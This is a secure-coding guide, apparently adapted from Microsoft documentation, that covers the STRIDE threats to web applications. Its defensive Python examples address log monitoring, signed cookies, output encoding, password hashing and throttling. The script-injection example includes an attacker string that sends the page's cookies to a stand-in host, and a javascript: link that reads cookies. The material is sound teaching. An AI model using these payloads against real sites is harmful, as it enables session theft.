Web Application Security Threats Overview (Visual Studio)

Source: Internet
Author: User
Tags: least privilege

If your web application can be reached by users you do not know, it is almost certain that malicious users will try to gain unauthorized access to it. Servers that are exposed to the public Internet are typically probed for security vulnerabilities every day. We therefore recommend that you take preventive measures and build security into every web application from the start.

For more details on best practices for writing secure code and securing applications, see the book Writing Secure Code by Michael Howard and David LeBlanc, and the guidance published by Microsoft Patterns and Practices.

Security technology is only part of the solution

Security technology is only part of the solution. Another important part is vigilance. Even if your system has many security measures in place, you need to monitor it closely in the following ways:

    • Monitor your system's event logs. Watch for repeated attempts to log on to the system and for an excessive number of requests to the web server.

    • Keep the application server up to date. Apply the latest security updates for Microsoft Windows and Internet Information Services (IIS), and any updates for Microsoft SQL Server or other data sources that your applications use.
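The kind of check the first bullet asks for, written out as an added example (it is not code from the original page or from IIS): a small parser for web-server log lines and a sliding-window detector that flags clients with repeated failed logons and clients that flood the server with requests. The log layout (date, time, client IP, method, URI, status), the sample lines and the thresholds are constructed assumptions for illustration, not the exact IIS W3C field order.

```python
"""Spot repeated failed logons and request floods in web-server log lines.

Added example. The log format below is a simplified, constructed
W3C-style layout (date time client-ip method uri status), not the exact
IIS field order, and the thresholds are illustrative assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log: one client hammers /login with bad credentials,
# another fails once and then succeeds, and a third floods /search.aspx.
SAMPLE_LOG = """\
2024-05-01 10:00:01 203.0.113.7 POST /login 401
2024-05-01 10:00:03 203.0.113.7 POST /login 401
2024-05-01 10:00:04 203.0.113.7 POST /login 401
2024-05-01 10:00:05 203.0.113.7 POST /login 401
2024-05-01 10:00:06 203.0.113.7 POST /login 401
2024-05-01 10:00:07 198.51.100.2 POST /login 401
2024-05-01 10:00:09 198.51.100.2 POST /login 200
2024-05-01 10:01:00 192.0.2.9 GET /index.aspx 200
""" + "".join(
    f"2024-05-01 10:02:00 192.0.2.9 GET /search.aspx?q={i} 200\n" for i in range(120)
)


def parse_log(text):
    """Parse log text into (timestamp, ip, method, uri, status) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time_, ip, method, uri, status = line.split()
        ts = datetime.strptime(f"{date} {time_}", "%Y-%m-%d %H:%M:%S")
        events.append((ts, ip, method, uri, int(status)))
    events.sort(key=lambda e: e[0])
    return events


def _bursts(events, matches, threshold, window_seconds):
    """Per client IP, count matching events inside a sliding time window and
    report the peak count for every IP that reached `threshold`."""
    recent = defaultdict(deque)
    alerts = {}
    for event in events:
        if not matches(event):
            continue
        ts, ip = event[0], event[1]
        window = recent[ip]
        window.append(ts)
        # Drop timestamps that have fallen out of the window.
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), len(window))
    return alerts


def failed_logon_bursts(events, threshold=5, window_seconds=60):
    """IPs with `threshold` or more failed logons (HTTP 401 on /login) in the window."""
    return _bursts(events, lambda e: e[3] == "/login" and e[4] == 401,
                   threshold, window_seconds)


def request_floods(events, threshold=100, window_seconds=10):
    """IPs that sent `threshold` or more requests of any kind in the window."""
    return _bursts(events, lambda e: True, threshold, window_seconds)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("failed logon bursts:", failed_logon_bursts(evts))
    print("request floods:", request_floods(evts))
```

Run against the constructed sample, the detector reports the brute-forcing client (five failures inside a minute) and the flooding client (120 requests inside ten seconds), while the client that mistyped a password once and then succeeded stays below the threshold. In production the same two functions would be fed the real log stream and the alerts forwarded to whoever is on watch.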

Threat Model

An important part of developing more secure applications is understanding the threats against them. Microsoft has developed a method for classifying threats: Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege (STRIDE). The following sections briefly describe these threats and how they apply to web applications.

Spoofing

"Spoofing" means impersonating a user or a process without authorization. In its simplest form, spoofing means typing in another user's credentials. A malicious user might also change the contents of a cookie to pretend to be a different user, or to make the cookie appear to come from a different server.

In general, you can prevent spoofing by using strict authentication. Whenever someone requests access to non-public information, make sure that their identity really is what they claim it to be. You can also protect credentials to help prevent spoofing. For example, do not store passwords or other sensitive information in cookies, because a malicious user can easily find or modify them.
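The cookie-tampering case above, as an added example that is not code from the original page or from ASP.NET's own forms authentication: the server stores only a user name and an expiry in the cookie, signs that payload with an HMAC, and rejects any cookie whose payload no longer matches its signature. The cookie layout (base64 payload, a dot, a hex HMAC-SHA256) and the fixed secret are illustrative assumptions.

```python
"""Tamper-evident session cookie: the server signs the cookie payload with
an HMAC so a client that edits the payload (for example to change the user
name) is detected. Added example, not ASP.NET's own forms-authentication
code; the cookie layout and the constant secret are illustrative assumptions."""
import base64
import hashlib
import hmac
import json
import time


def _b64encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _b64decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_session_cookie(secret: bytes, username: str, ttl_seconds: int, now=None) -> str:
    """Return '<payload>.<hmac-sha256 hex>'. The payload holds only the user
    name and an expiry, never the password."""
    now = int(time.time()) if now is None else now
    payload = json.dumps({"u": username, "exp": now + ttl_seconds},
                         separators=(",", ":")).encode()
    body = _b64encode(payload)
    sig = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def read_session_cookie(secret: bytes, cookie: str, now=None):
    """Return the user name if the signature and expiry check out, else None."""
    now = int(time.time()) if now is None else now
    body, sep, sig = cookie.partition(".")
    if not sep:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison so timing does not leak how many bytes matched.
    if not hmac.compare_digest(sig, expected):
        return None
    try:
        payload = json.loads(_b64decode(body))
    except (ValueError, TypeError):
        return None
    if not isinstance(payload, dict) or payload.get("exp", 0) < now:
        return None
    return payload.get("u")


def forge_username(cookie: str, new_username: str) -> str:
    """What a malicious client tries: rewrite the payload, keep the old signature."""
    body, _, sig = cookie.partition(".")
    payload = json.loads(_b64decode(body))
    payload["u"] = new_username
    forged_body = _b64encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{forged_body}.{sig}"
```

The forged cookie decodes cleanly (the attacker can read the payload, it is only encoded, not encrypted) but fails the signature check, as does a cookie presented after its expiry or to a server holding a different secret. Anything secret must still stay out of the payload: the signature proves integrity, not confidentiality.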

Tampering

"Tampering" means modifying or deleting a resource without authorization. For example, a malicious user could gain access to your web site and change files so that the web pages are defaced. An indirect form of tampering is a script exploit: a malicious user tries to get code (script) executed by disguising it as user input in a form or as a link.

The primary way to prevent tampering is to use Windows security to lock down files, directories, and other Windows resources. Applications should also run with minimal privileges. Not trusting any information that comes from users, or even from a database, helps to prevent script exploits. Whenever you get information from an untrusted source, treat it as data rather than as markup: encode or validate it so that it cannot be interpreted as script when it is processed or rendered.
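The script exploit described above, shown beside its hardened form as an added example (not code from the original page): the vulnerable function pastes form input straight into the page, so a "name" carrying a script tag and a "link" with a javascript: target both execute in the visitor's browser; the hardened function HTML-encodes every untrusted value for its context and only accepts absolute http(s) links through an allow-list. The comment-page markup, the attacker strings and the link policy are constructed assumptions.

```python
"""Script exploit through form input, and the hardened rendering.
Added example; the comment-page markup and the http(s)-only link policy
are illustrative assumptions, not code from the original page."""
import html
from urllib.parse import urlparse

# Constructed attacker input: a "name" that carries a script and a "link"
# that runs script when clicked.
ATTACKER_NAME = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTACKER_LINK = "javascript:alert(document.cookie)"


def render_comment_unsafe(name: str, text: str, link: str) -> str:
    """Vulnerable: untrusted strings are pasted straight into the HTML, so the
    browser executes whatever script they contain."""
    return f'<p><a href="{link}">{name}</a>: {text}</p>'


def safe_href(url: str):
    """Allow only absolute http(s) links; anything else (javascript:, data:,
    a scheme-less or protocol-relative string) is rejected, not sanitized."""
    parsed = urlparse(url)
    if parsed.scheme in ("http", "https") and parsed.netloc:
        return url
    return None


def render_comment_safe(name: str, text: str, link: str) -> str:
    """Hardened: every untrusted value is HTML-encoded for its context, and
    the link target goes through an allow-list instead of being trusted."""
    href = safe_href(link)
    label = html.escape(name, quote=True)
    body = html.escape(text, quote=True)
    if href is None:
        return f"<p>{label}: {body}</p>"
    return f'<p><a href="{html.escape(href, quote=True)}">{label}</a>: {body}</p>'
```

Note that the hardened version never tries to strip "bad" characters out of the link: a deny-list misses case variants and encodings, whereas the allow-list only has to recognise the two schemes that are actually wanted.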

Repudiation

A "repudiation" threat means that a party to a transaction can deny having taken part in it after the transaction is complete. In web applications this can take the form of impersonating an innocent user's credentials. You can help prevent repudiation by using strict authentication. In addition, use the logging features of Windows to keep an audit trail of all activity on the server. For more information, see Logging Application, Server, and Security Events.

Information Disclosure

"Information disclosure" simply means that confidential information is stolen or exposed. A typical example is password theft, but it can involve access to any file or resource on the server.

The best defense against information disclosure is to have no information to disclose. For example, if you do not store passwords, a malicious user cannot steal them. (An alternative to storing passwords is to store only a hash of each password. When a user presents credentials, you hash the supplied password and compare only the two hashes.)
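The hash-and-compare scheme in the parenthesis, worked out as an added example that is not code from the original page or from ASP.NET: each password is hashed with a fresh random salt using PBKDF2-HMAC-SHA256 from the Python standard library, the stored record carries the algorithm, iteration count, salt and digest, and verification recomputes the digest and compares it in constant time. The record format "pbkdf2_sha256$iterations$salt$hash" and the iteration count are illustrative assumptions.

```python
"""Store a salted password hash instead of the password, and verify a
presented password by hashing it the same way and comparing digests.
Added example using PBKDF2-HMAC-SHA256 from the standard library; the
record format 'pbkdf2_sha256$iterations$salt$hash' and the iteration
count are illustrative assumptions, not the page's or ASP.NET's format."""
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
DEFAULT_ITERATIONS = 600_000  # deliberately slow, to make offline guessing expensive


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS, salt: bytes = None) -> str:
    """Return a storable record. A fresh random salt means identical passwords
    produce different records, so a leaked table cannot be attacked in bulk."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(record: str, password: str) -> bool:
    """Recompute the hash from the stored salt and iteration count and compare
    in constant time. Returns False for malformed or unknown records."""
    try:
        algorithm, iterations, salt_hex, digest_hex = record.split("$")
        if algorithm != ALGORITHM:
            return False
        iterations = int(iterations)
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(digest_hex)
    except ValueError:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(actual, expected)


def needs_rehash(record: str, iterations: int = DEFAULT_ITERATIONS) -> bool:
    """True if the record was made with fewer iterations than the current policy
    (or an unknown algorithm); rehash it at the user's next successful logon."""
    try:
        algorithm, stored_iterations, _, _ = record.split("$")
        return algorithm != ALGORITHM or int(stored_iterations) < iterations
    except ValueError:
        return True
```

The password itself never appears in the record, and because the record names its own parameters the iteration count can be raised later without invalidating existing users: `needs_rehash` tells the logon code when to replace an old record with a stronger one.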

If you do have to store sensitive information, use Windows security to protect it. As always, use authentication to ensure that only authorized users can access restricted information. If sensitive information must be exposed, it is recommended that you encrypt it when it is stored and use Secure Sockets Layer (SSL, today TLS) to encrypt it while it travels to and from the browser.

Denial of Service

A denial-of-service (DoS) attack aims to reduce the availability of your application. A typical example is overloading a web application so that it can no longer serve ordinary users. Alternatively, a malicious user might simply try to crash your server.

IIS allows you to throttle an application, that is, to limit the number of requests it will service. You may also be able to deny access to known malicious users or IP addresses. To keep your application online you must run robust code: test the application thoroughly and respond appropriately to error conditions wherever possible.
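Throttling and an IP deny list, as an added example that is not IIS's own throttling code: each client gets a sliding window of recently served requests, requests beyond the limit are refused before any work is done, and clients on the deny list are refused outright. The limits, the deny list and the simulated request streams are illustrative assumptions.

```python
"""Per-client request throttling with a deny list: a sliding window counts
each client's recent requests and refuses the excess instead of letting the
server be overloaded. Added example, not IIS's own throttling; the limits
and the deny list are illustrative assumptions."""
from collections import defaultdict, deque


class RequestThrottle:
    def __init__(self, max_requests: int, window_seconds: float, denied_ips=()):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self.denied_ips = set(denied_ips)
        self._recent = defaultdict(deque)  # ip -> timestamps of served requests

    def allow(self, ip: str, now: float) -> bool:
        """Return True if the request may be served. `now` is the request time in
        seconds so the check is deterministic; production would pass time.time()."""
        if ip in self.denied_ips:
            return False
        window = self._recent[ip]
        while window and now - window[0] >= self.window_seconds:
            window.popleft()
        if len(window) >= self.max_requests:
            return False  # over the limit: reject before doing any work
        window.append(now)
        return True

    def deny(self, ip: str):
        """Add a known-bad client so every later request is refused outright."""
        self.denied_ips.add(ip)
        self._recent.pop(ip, None)


def simulate(throttle, requests):
    """Feed (ip, time) pairs through the throttle; return per-IP counts of
    served and rejected requests. Each IP's times must be non-decreasing."""
    served = defaultdict(int)
    rejected = defaultdict(int)
    for ip, t in requests:
        if throttle.allow(ip, t):
            served[ip] += 1
        else:
            rejected[ip] += 1
    return dict(served), dict(rejected)
```

With a limit of five requests per ten seconds, a client that sends fifty requests in five seconds gets five served and forty-five refused, while a client that sends one request every three seconds is never throttled. The rejected requests cost the server only a dictionary lookup and a deque scan, which is the point: the expensive work is what the attacker wants you to do.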

Privilege Escalation

A "privilege escalation" attack is one in which a malicious user obtains more permissions than would normally be granted. For example, in a successful privilege escalation attack a malicious user gains administrative privileges on the web server, which gives access to any data on the server and control over the server's capabilities.

To help prevent privilege escalation, run the application in a least-privileged context where feasible. For example, it is recommended that you do not run ASP.NET applications as the SYSTEM (administrative) user.
